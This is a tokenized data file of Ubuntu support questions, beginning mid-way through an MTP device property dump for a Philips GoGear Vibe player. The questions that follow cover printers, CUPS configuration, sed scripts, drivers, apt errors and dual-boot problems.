32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set 300c : asf dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 5000 , max 430000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , 352 , 353 , get/set dc88 : height uint32 data type range : min 0 , max 240 , step 1 get/set dc87 : width uint32 data type range : min 0 , max 320 , step 1 get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set de9e : key frame distance uint32 data type range : min 0 , max 15000 , step 1 get/set de9d : frames per thousand seconds uint32 data type range : min 0 , max 30050 , step 1 get/set de9b : video four cc codec uint32 data type enumeration : 0 , 861293911 , get/set de9c : video bit rate uint32 data type range : min 5000 , max 768010 , step 1 read only de97 : scan depth uint16 data type enumeration : 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , get/set dea1 : encoding profile string data type get/set dc84 : representative sample width uint32 data type range : min 0 , max 10000 , step 1 get/set dc83 : representative sample height uint32 data type range : min 0 , max 10000 , step 1 get/set dc82 : representative sample sise uint32 data type range : min 0 , max -1 , step 1 read only dc81 : representative sample format uint16 data type enumeration : 14337 , 14340 , 14343 , get/set dc86 : representative sample data array of uint8 data type byte array : get/set 3001 : association/directory dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc05 : association type uint16 data type enumeration : 0 , 1 , get/set dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set dc09 : date modified string data type datetime form get/set ba05 : abstract audio video playlist dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set dc09 : date modified string data type datetime form get/set 3801 : jpeg dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set dc88 : height uint32 data type range : min 0 , max 10000 , step 1 get/set dc87 : width uint32 data type range : min 0 , max 10000 , step 1 get/set dc09 : date modified string data type datetime form get/set dc99 : original release date string data type datetime form get/set dc97 : effective rating uint16 data type range : min 0 , max 100 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set dc84 : representative sample width uint32 data type range : min 0 , max 10000 , step 1 get/set dc83 : representative sample height uint32 data type range : min 0 , max 10000 , step 1 get/set dc82 : representative sample sise uint32 data type range : min 0 , max -1 , step 1 read only dc81 : representative sample format uint16 data type enumeration : 14337 , 14340 , 14343 , get/set dc86 : representative sample data array of uint8 data type byte array : get/set 3807 : gif dc01 : storage id uint32 data type any 32bit value form read only [ removed because of character limit ] dc86 : representative sample data array of uint8 data type byte array : get/set 3804 : bmp dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set dc88 : height uint32 data type range : min 0 , max 10000 , step 1 get/set dc87 : width uint32 data type range : min 0 , max 10000 , step 1 get/set dc09 : date modified string data type datetime form get/set dc99 : original release date string data type datetime form get/set dc97 : effective rating uint16 data type range : min 0 , max 100 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set dc84 : representative sample width uint32 data type range : min 0 , max 10000 , step 1 get/set dc83 : representative sample height uint32 data type range : min 0 , max 10000 , step 1 get/set dc82 : representative sample sise uint32 data type range : min 0 , max -1 , step 1 read only dc81 : representative sample format uint16 data type enumeration : 14337 , 14340 , 14343 , get/set dc86 : representative sample data array of uint8 data type byte array : get/set ba03 : abstract audio album dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9b : album artist string data type get/set dc44 : name string data type get/set dc8c : genre string data type get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc84 : representative sample width uint32 data type range : min 0 , max 10000 , step 1 get/set dc83 : representative sample height uint32 data type range : min 0 , max 10000 , step 1 get/set dc82 : representative sample sise uint32 data type range : min 0 , max -1 , step 1 read only dc81 : representative sample format uint16 data type enumeration : 14337 , 14340 , 14343 , get/set dc86 : representative sample data array of uint8 data type byte array : get/set b905 : unknown ( b905 ) dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set 3000 : undefined type dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc44 : name string data type get/set b904 : audible.com codec dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 5000 , max 430000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set da00 : unknown property uint32 data type enumeration : 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , read only da02 : unknown property uint32 data type any 32bit value form get/set da01 : unknown property string data type read only da03 : unknown property uint16 data type enumeration : 0 , 1 , get/set da04 : unknown property uint128 data type read only b301 : unknown ( b301 ) dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 5000 , max 430000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set da00 : unknown property uint32 data type enumeration : 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , read only da02 : unknown property uint32 data type any 32bit value form get/set da01 : unknown property string data type read only da03 : unknown property uint16 data type enumeration : 0 , 1 , get/set da04 : unknown property uint128 data type read only storage devices : storageid : 0x00000000 storagetype : 0x0000 ( undefined ) filesystemtype : 0x0000 ( undefined ) accesscapability : 0x0000 read/write maxcapacity : 0 freespaceinbytes : 0 freespaceinobjects : 4294967295 storagedescription : internal storage volumeidentifier : 2aff00002e1d91830002da9553621183 special directories : default music folder : 0xffffffff default playlist folder : 0xffffffff default picture folder : 0xffffffff default video folder : 0xffffffff default organizer folder : 0xffffffff default zencast folder : 0xffffffff default album folder : 0xffffffff default text folder : 0xffffffff mtp-specific device properties : friendly name : gogear vibe synchronization partner : gogear vibe battery level 89 of 100 ( 88 % ) libmtp supported ( playable ) filetypes : iso mpeg-1 audio layer 3 riff wave file microsoft windows media audio microsoft advanced systems format folder abstract playlist file jpeg file gif bitmap file bmp bitmap file abstract album file audible.com audio codec ok. ` thinking that maybe the file system is damaged , i tried to format the device mtp-format resulting in libmtp version : 1.1.6 device 0 ( vid=0471 and pid=207b ) is a philips gogear vibe sa1vbe04/08 . unable to open ~/.mtpz-data for reading , mtpz disabled.i will now format your device . this means that all content ( and licenses ) will be lost forever . you will not be able to undo this operation . continue ? ( y/n ) > y failed to format device . error 2 : ptp layer error 02ff : get_all_metadata_fast ( ) : could not get proplist of all objects . error 2 : error 02ff : ptp : i/o error error 2 : ptp layer error 02fe : get_handles_recursively ( ) : could not get object handles . error 2 : error 02fe : ptp : protocol error , data expected error 2 : ptp layer error 2002 : libmtp_format_storage ( ) : failed to format storage . error 2 : error 2002 : ptp : general error observation 2 : the error above , `` could not get proplist of all objects '' is the same one i get when i try to open the device in nautilus . summary : i can see my philips gogear vibe player under 'lsusb ' , but it is does not appear when i run 'fdisk -l ' . 'mtp-detect ' correctly identifies the device , but fails when i try to format the device . any ideas what i should do next ?
430600	samsung printer on ubuntu server 12.04lts	i have been playing with ubuntu for a while now and had everything going including a print server for windows machines . i shared my printers with samba and managed them with cups . all of a sudden an update came by and my samsung ml-1670 series stopped working . my other hp deskjet f300 printer still works . i have tried to send new drivers , downloaded at the samsung website , and manually add pdd files through the cups webinterface but it did n't work . from my windows 8.1 machine i can see the shared printer now and then but ca n't connect it . this problem only shows for the samsung printer . the hp is just fine . can anyone help me with this problem or suggest a troubleshoot ? ( already tried the'how to troubleshot a printer failure ' ) thanks a lot jogchum
430601	are any ubuntu ( linux ) vulnerabilities in media applications ?	ubuntu ( linux ) has a solid system that permits and requires root privileges to modify the system . however ; if an installed application eg . vlc , audacious , some image viewer installed from the software center has a vulnerability , and these applications play a file with an embedded malicious code or maybe an executable does exploits vulnerabilities in the application that was already running with administrator privileges ( vlc , audacious etc ... ) . could this compromise the system ?
430603	how to make the compressed filesystem smaller	i 'm trying to make an image of my currently installed ubuntu using relinux . i 'm working on ubuntu 12.10 and my machine is dell inspiron i 've followed this video http : //www.youtube.com/watch ? v=3q6mibds4fo and i 've read the readme and the install document coming with the package , but there was nothing about how to reduce the size of the compressed filesystem when typed relinux squashfs ./relinux.conf in terminal it took a lot of time till step 5 of squashfs and the following was the output # # # # # # # # # # # # # # # # # # # # # # # # # # step 5 of squashfs # # # # # # # # # # # # # # # # # # # # # # # # # # creating filesystem.squashfs this will take a while so be patient adding stage 1 files/folders that the livecd requires . adding stage 2 files/folders that the livecd requires . this will probably take longer than the first stage . the compressed filesystem is larger than the iso9660 specification allows for a single file . you must try to reduce the amount of data you are making and try again . i 've tried to reduce my home folder ( which contains downloads , music , etc . ) till it become just 180 mbyte and when checking my filesystem size it was about 9 gbyte most of them was consumed by home folder which contains ( home and relinux ) , relinux itself was about 5.5 gbyte , i thought that this folder was created in the first try so i 've tried to delete it but it 's `` deleteless '' so i ca n't delete it.. now the question is how can i reduce the size of the compressed filesystem without removing any of the currently installed packages and programs from the final dvd of ubuntu ? thanks all
430604	ubuntu 12.04 does not read canon 7d	i 'm unable to import photos from my canon eos 7d , because the ubuntu does not recognize it once pluged at usb . i have tried all usb ports , but no one recognizes the camera . i have tested successfully other appliances at the usb ports . i 'm new at linux , so i 'd appreciate real step by step solution . many thanks
430605	how to install jupiter on ubuntu 12.04	i am currently running 12.04 and i ca n't get jupiter to install on my computer . these are the commands i am running to install it : sudo add-apt-repository ppa : webupd8team/jupiter sudo apt-get update sudo apt-get install jupiter this is the error i get after updating : w : failed to fetch http : //ppa.launchpad.net/webupd8team/jupiter/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found and finally after install jupiter , i get this error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package jupiter any ideas on how i can fix this issue ? or can anyone point me in the right direction ?
430606	installing hp printer on crouton , hplip says cups is missing	i 'm trying to get my hp deskjet 3000 hooked up through crouton on my toshiba chromebook . i followed the instructions for installation from http : //hplipopensource.com/hplip-web/install/install/index.html and i eventually ran into this : dependency and conflict resolution -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- running 'sudo apt-get install -- assume-yes libcups2' please wait , this may take several minutes ... error : a required dependency 'cups ( cups - common unix printing system ) ' is still missing . running post-package commands -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ok re-checking dependencies -- -- -- -- -- -- -- -- -- -- -- -- error : a required dependency 'cups ( cups - common unix printing system ) ' is still missing . error : installation can not continue without this dependency . error : please manually install this dependency and re-run this installer . but then when i run : sudo apt-get install cups i get : reading package lists ... done building dependency tree reading state information ... done cups is already the newest version . the following package was automatically installed and is no longer required : libglade2-0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ( precise ) alan @ localhost : ~ $ i 'm kind of lost at this point . how do i get cups installed to where hplip recognizes it , and completes the installation ?
430610	why ca n't i get steam on ubuntu	so i have an acer c7 chromebook and i have chrubuntu 13.10 i think and its 64 bit and i installed steam from the software center but when i open it up it tell me i have to install a package and when i type in my pass word and hit enter it says : you are missing the following 32-bit libraries , and steam may not run : libc.so.6
430617	gnome2 network applet issue - annoying another icon appears .	i 'm using ubuntu 13.10 , installed the gnome-2 mate desktop environment . one thing that annoys me the most is the network icon in the panel . ok , so the network applet runs when the system starts . to choose the connection you want , of course you have to launch it , another icon will appear in the notification bar . if you click the network applet more than once , a lot of this icons will appear too . is there anyway we can connect directly without seeing this other `` icon '' appear in the notification bar . i do n't want to go back to the default desktop environment , i do n't like unity . the network applet should contain the list of the network connections available once the computer starts . thanks .
430621	cups - remove password prompt	i have a printer installed on an ubuntu server ( 12.04 lts ) i can print items with no issue , but it always prompts for a username and password , which is super annoying . i tried everything i could find about it online but nothing seems to remove the prompt . i set defaultauthtype to none in /etc/cups/cupsd.conf , still a prompt . also just read this post : cups is always asking for password when printing on a certain printer but that did n't help either sadly , though for me i only have one printer so i 'm baffled on what to do now . thanks . edit : here is what my cups files look like : printer.conf # printer configuration file for cups v1.5.3 # written by cupsd # do not edit this file when cupsd is running < defaultprinter canon_mx310_series > uuid urn : uuid:5a7453c6-3dc0-3bce-53f1-7584efb6144a info canon mx310 series location living rm makemodel canon pixma mx300 - cups+gutenprint v5.2.8-pre1 deviceuri usb : //canon/mx310 % 20series ? serial=16be66 & interface=1 state idle statetime 1388353343 type 12627980 accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy default authinforequired none errorpolicy retry-job option media-col media-bottom-margin < /printer > cupsd.conf loglevel warn maxlogsize 0 systemgroup lpadmin # allow remote access port 631 listen /var/run/cups/cups.sock browsing on browseorder allow , deny browseallow all browselocalprotocols cups dnssd browseaddress @ local defaultauthtype none webinterface yes < location / > # allow remote administration ... order allow , deny allow all < /location > < location /admin > authtype none # allow remote administration ... order allow , deny allow all < /location > < location /admin/conf > authtype none require user @ system # allow remote access to the configuration files ... order allow , deny allow all < /location > < policy default > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > < policy authenticated > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cancel-job cups-authenticate-job > authtype none require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy >
430623	is it possible to bypass cryptswap during boot ?	i am using teamviewer to remote into my laptop and the cryptswap password entry during boot occurs before teamviewer gets executed , meaning that i can not restart my laptop remotely . is there a way to temporarily disable cryptswap , or perhaps set a time limit for the password entry ?
430625	how to make sed works with break lines from file ?	i 'm adapting this script to insert file 's content into another file . this is what i have now : # ! /bin/sh # check if first and second parameters exist if [ ! -z `` $ 2 '' ] ; then string= $ ( cat $ 1 ) # check if the supplied file exist if [ -e $ 2 ] ; then sed -i -e `` 2i $ string '' $ 2 echo `` the string \ '' $ string\ '' has been successfully inserted . '' else echo `` the file does not exist . '' fi else echo `` error : both parameters must be given . '' fi i run it with : ./prepend.sh content.txt example.txt the content.txt file : first_line second_line the example.txt file : real_first_line real_second_line the script 's output : sed : -e expression # 1 , char 24 : unterminated `s ' command the string `` first_line second_line '' has been successfully inserted . and the content of example.txt file remains the same , when i wan na this to be like this : real_first_line first_line second_line real_second_line
430627	i can not do anything after logging in on ubuntu 13.10	i 'm usimg toshiba satellite l750 , and i recently installed ubuntu 13.10 along with windows 7 . yesterday i installed nvidia graphic card driver ( for geforce gt525m ) , and today i got a notification from software center that there is some update to be done , so i did so . ( i did n't really check what it was ) and after rebooting , the resolution of the screen became something like 800*600 ( it was 1366*768 originally ) and after logging in , i only get the black screen with my cursor only and none of the short cut keys are working . i ca n't even shut down . i suspect that it has something to do with the graphic card driver , but i 'm not really sure ... can anyone help me solving this , other than reinstalling ubuntu again ?
430630	spark client customization	i need a detailed guide for building a customized spark client installation package for ubuntu 12.04 32 and 64 bit . source code : http : //www.igniterealtime.org/downloads/source.jsp objective : customized client with company logo and control/hide client features , tabs , menus ... .etc modify client identifier ( resource ) so that it can be added on openfire server to prohibit installing any other client but the customized one ( even the downloaded spark client from internet ) .
430631	live usb wont work with windows 8	everytime i try starting the computer with the flash drive in , it just flashes the lenovo logo as it would normally do , but except it does not stop . it looks as if it is in an infinet loop . as soon i take the flash drive out it just starts windows 8 normally . i tried using 3 different usb ports , both the 64 and 32 bit versions , and 2 different softwares for putting it on to the actual flash drive . same thing everytime . but when i go try it on an old xp computer i have , its just fine . i think it has something to with the bios on windows 8 ( if it is even still called that ) , its definetly different from anything else i have seen in older systems , and harder to use . this is beyond annoying and ive just ran out of ideas . i just want it to work . i have a lenovo p500 with windows 8
430635	how to run xdman ( xtream download manager ) on ubuntu startup ?	does someone knows the commands on running xdman on startup ? or at least the app directory of xdman ?
430636	how to burn torrent movies to a dvd-rw that work !	i just downloaded ubuntu to my dell laptop and i 'm about 6 hrs new to this system . on my girlfriends windows 7 laptop i burnt the movie frozen to a dvd-rw and put it in the xbox , ps4 , and a portable dvd player but none of them worked . since i am new to this ubuntu i am wondering what type of programs will i need and how can burn working movies to a dvd-rw that works in most movie players like xbox , ps4 , or most dvd players .
430637	install mysql drivers ?	the instructions here tells me to install : libtdsodbc.so but how do i install a .so file in ubuntu 13.10 ? i 'm trying to connect to a ms sql db to extract data into mysql db . i have mysql operational already .
430640	not installing ubuntu	i have latest ubuntu with original cd.i want to install it without leaving the window 7.and it directly not appear to install the window when inserted.when i restart the laptop i pressed the escape key and choose the boot device option and the internal cd drive and later on processing it displays window to install ubuntu but it will format and repartition the hdd.help me sir to install the ubuntu with the window 7 so that i can use both the ubuntu and window 7. thakyou .
430642	video driver failed to load	i am dual booting ubuntu 13.10 along side windows 7 . it was initially working fine . suddenly one day , when i switch into ubuntu , it started loading and the screen went off . i thought there might have been some lose connections . so i plugged out the vga cord of the monitor and plugged it back again . the screen started and it showed a msg `` your running in a low graphics mode '' along with several set of options to select . unfortunately , the keyboard also doesnot work . what might be the cause of this ? how do i resolve the same ? thanks & regards , hitesh suvarna
430644	screen brightness reset to minimum after every reboot on hp pavilon dv4 . help	ubuntu 13.10 does n't save my brightness settings between sessions . everytime i boot up , the brightness is always at zero , and i always have to set it back to my preferred setting ( at maximum ) . how can i ensure that my brightness preference will persist after reboot ? i am using a hp pavilion dv4 . i see where this question has been answered but no one gives step by step instructions on how to get it completed . thank you
430645	grub rescue errors windows 8 dual boot	i turned my pc on and i got the grub rescue prompt . so i have checked a number of threads and found the ls ( hd0 , gpt7 ) /boot/grub stuff . which i tried all 7 combination including the alternate /lib/grub/i386-pc . with no success . so here i am wondering if there is anything else to try .
430648	web application to show concise system status of multiple servers	i 've long since been interested in a fairly particular kind of global status report . it seems there are loads of great log consolidation options out there , like syslog servers ( not to mention splunk ) . what i 'm really looking for is an interface resembling a switch board panel.. i want a big pile of green lights ( that i can tune ) and red ones for when something needs attention . i suppose yellow 's also warranted for warning status items . i want such a system to email me reports when something 's down or failing . does this ring any bells ? this sort of thing must exist , right ? crap , maybe i 'll have to make it ?
430651	apache2 not starting : libaprutil-1.so.0 = > not found	i was installing apache2 on ubuntu 13.10 , but after installation i tried to run apache showin error : $ sudo ./httpd start ./httpd : error while loading shared libraries : libaprutil-1.so.0 : can not open shared object file : no such file or directory i tried solutions given on web , none of them working , please help ! ! $ ldd httpd linux-vdso.so.1 = > ( 0x00007ffff05fe000 ) libpcre.so.1 = > /usr/local/lib/libpcre.so.1 ( 0x00007f60741a5000 ) libaprutil-1.so.0 = > not found libapr-1.so.0 = > /usr/local/apr/lib/libapr-1.so.0 ( 0x00007f6073f71000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f6073d54000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f607398c000 ) libuuid.so.1 = > /lib/x86_64-linux-gnu/libuuid.so.1 ( 0x00007f6073786000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f6073582000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f60743d9000 )
430652	install failed - apt-get wo n't work	i tried to install php-java-bridge-j2ee-selinux from source using apt-get but that failed . now what ever i want to remove or install using apt-get , it gives me error : e : the package php-java-bridge-j2ee-selinux needs to be reinstalled , but i ca n't find an archive for it . how do i get rid of it ? edit 2 same issue : sudo dpkg -i ~/downloads/php-java-bridge-j2ee-selinux*.deb ( reading database ... 180639 files and directories currently installed . ) preparing to replace php-java-bridge-j2ee-selinux 6.1.2.1-1 ( using ... /php-java-bridge-j2ee-selinux_6.1.1-2_all.deb ) ... invoke-rc.d : unknown initscript , /etc/init.d/tomcat5.5 not found . dpkg : error processing /home/aceph/downloads/php-java-bridge-j2ee-selinux_6.1.1-2_all.deb ( -- install ) : subprocess new pre-installation script returned error exit status 100 /var/lib/dpkg/tmp.ci/postrm : 39 : /var/lib/dpkg/tmp.ci/postrm : semodule : not found dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 127 errors were encountered while processing : /home/aceph/downloads/php-java-bridge-j2ee-selinux_6.1.1-2_all.deb when i remove something : $ sudo apt-get remove docky reading package lists ... done building dependency tree reading state information ... done e : the package php-java-bridge-j2ee-selinux needs to be reinstalled , but i ca n't find an archive for it . i have tomcat7 installed . here 's $ java -version $ java -version java version `` 1.7.0_51 '' openjdk runtime environment ( icedtea 2.4.4 ) ( 7u51-2.4.4-0ubuntu0.13.10.1 ) openjdk 64-bit server vm ( build 24.45-b08 , mixed mode ) edit 1 i run following , same error : $ sudo apt-get remove -- purge php-java-bridge-j2ee-selinux reading package lists ... done building dependency tree reading state information ... done e : the package php-java-bridge-j2ee-selinux needs to be reinstalled , but i ca n't find an archive for it .
430657	ubuntu wo n't connect to the internet - bcm4312	i 've looked at the other questions about having problems connecting to the internet , but it has n't worked for me so far . i bought a netbook and i wanted to try ubuntu out , which i installed from a usb . so i installed it , replacing the windows7 that came with it , and now it does n't connect to the internet ( it did connect when it was windows ) . i 've run some of the more basic steps , and have tried to install some dkms from the pool files , but it wo n't let me install anything . i do n't know the commands that well , so i ca n't say that i 'm doing things correctly , so if anyone could please walk me through this - i 'd be much obliged . it also does n't recognize an ethernet cord . using ubuntu 3.11.0-15-generic lts-saucy bcm4312 [ 14e4:4315 ]
430661	how to install lucene 4.0.7 in ubuntu 12.04	i am using ubuntu 12.4 and i have an assignment to explore lucene 4.0.7 . but i could not install it . i did not get any type of help from search engines or other forums . so please any body help me.here is the link for lucene 4.0.7 `` http : //stingray.cyber.net.pk/pub/apache/lucene/java/4.7.0/ ''
430662	bullet list that looks the same in impress and powerpoint	when i create a bulleted list in microsoft powerpoint , there is a space between the bullet and the text-line . but when i save it as a ppt file ( in 2003 compatibility mode ) and then open it in impress , there is no space between the bullet and the text-line . if i add space manually in impress , it does n't look good in powerpoint ... is there a way to create bulleted lists that look good in both powerpoint and impress ?
